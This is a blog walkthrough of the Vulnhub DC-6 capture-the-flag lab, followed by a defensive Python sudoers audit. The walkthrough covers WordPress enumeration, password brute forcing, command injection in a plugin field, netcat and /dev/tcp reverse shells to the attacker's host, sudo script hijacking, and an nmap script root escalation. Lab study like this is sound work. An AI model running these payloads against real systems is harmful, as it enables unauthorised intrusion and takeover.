Vulnhub DC_6

Introduction

vulnhub dc6

https://www.vulnhub.com/entry/dc-6,315/

Target IP

192.168.1.12

Add to hosts

192.168.1.12 wordy

Information gathering

nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt 
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Wordy – Just another WordPress site
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:AA:DF:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Operating system: Linux 3.2 - 4.14 (Debian)
  • Web server: Apache 2.4.25 (Debian)
  • CMS: WordPress 5.1.1
dirsearch -u http://192.168.1.12 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt 
gobuster dir -u http://192.168.1.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
/index.php
/wp-admin
/wp-content
/wp-includes
/xmlrpc.php
/wp-login.php
/license.txt
/readme.html
/wp-trackback.php
/wp-signup.php
/server-status

wpscan

The CMS is known to be WordPress 5.1.1, so enumerate it with wpscan.

Users

wpscan --url http://wordy --enumerate u 
admin
sarah
graham
mark
jens

Brute force

wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt

Credentials obtained

mark:helpdesk01

Admin panel RCE

Log in with the credentials

http://wordy/wp-login.php?registration=disabled

Activity monitor -> Tools -> Lookup is vulnerable to command execution

------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="ip"

127.0.0.1 || whoami
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="lookup"


Reverse shell

127.0.0.1 || nc -c /bin/bash 192.168.1.17 6666


Found information in /home/mark/stuff/things-to-do.txt

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

This yields another set of credentials

graham:GSo7isUM1D4

SSH login


Lateral movement via backups.sh

A backup script, backups.sh, is in /home/jens, and user graham's sudo permissions are:

(jens) NOPASSWD: /home/jens/backups.sh

User graham can run the script /home/jens/backups.sh as user jens without entering a password. Overwrite the script's contents and run it as jens:

echo '#!/bin/bash' > backups.sh
echo 'bash -i >& /dev/tcp/192.168.1.17/7777 0>&1' >> backups.sh
sudo -u jens /home/jens/backups.sh

Obtained a shell as jens


Privilege escalation via nmap

sudo -l shows that /usr/bin/nmap can be run with sudo

Escalate

echo 'os.execute("/bin/bash")' > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)


Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
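
Both sudo steps above (the rewritable backups.sh and nmap with --script) come down to sudoers rules that let the caller choose the code that runs. The audit below is an added example, not part of the original write-up: it checks `sudo -l` rule lines for those two conditions. The finding labels, the short binary list, and the sample rules and file mode are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# One rule line as printed by `sudo -l`, e.g. "(jens) NOPASSWD: /home/jens/backups.sh"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")

# Assumed, deliberately short list of binaries that run caller-supplied code by design.
# nmap is here because of its --script option, as used on this page.
RUNS_CALLER_CODE = {"nmap", "bash", "sh", "python3", "perl", "vim", "find"}


def audit_rule(line):
    """Return the findings for one `sudo -l` rule line (empty list if it is not a rule)."""
    m = RULE.match(line)
    if not m:
        return []
    path, findings = m["cmd"], []
    if "NOPASSWD" in m["tags"]:
        findings.append("nopasswd")
    if os.path.basename(path) in RUNS_CALLER_CODE:
        findings.append("runs-caller-code")
    try:
        st = os.stat(path)
    except FileNotFoundError:
        # Whoever can create the missing file decides what the rule executes.
        return findings + ["missing-target"]
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group-or-world-writable")
    if st.st_uid != 0:
        findings.append("not-root-owned")
    return findings


def demo():
    """Audit constructed rules against a constructed, group-writable script."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backups.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(script, 0o775)  # constructed mode: group members can rewrite it
        rules = [f"(jens) NOPASSWD: {script}", "(root) NOPASSWD: /usr/bin/nmap"]
        return {rule: audit_rule(rule) for rule in rules}


if __name__ == "__main__":
    for rule, findings in demo().items():
        print(rule, "->", ", ".join(findings))
```

A rule target that is flagged as writable or not root-owned should be made root-owned with mode 0755 or stricter, and binaries in the caller-code list should not appear in sudoers without a restricted wrapper.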

Vulnhub DC_6
http://xiaowu5.cn/2026/02/22/Vulnhub-DC-6/
Author
5
Published on
February 22, 2026
License
BY XIAOWU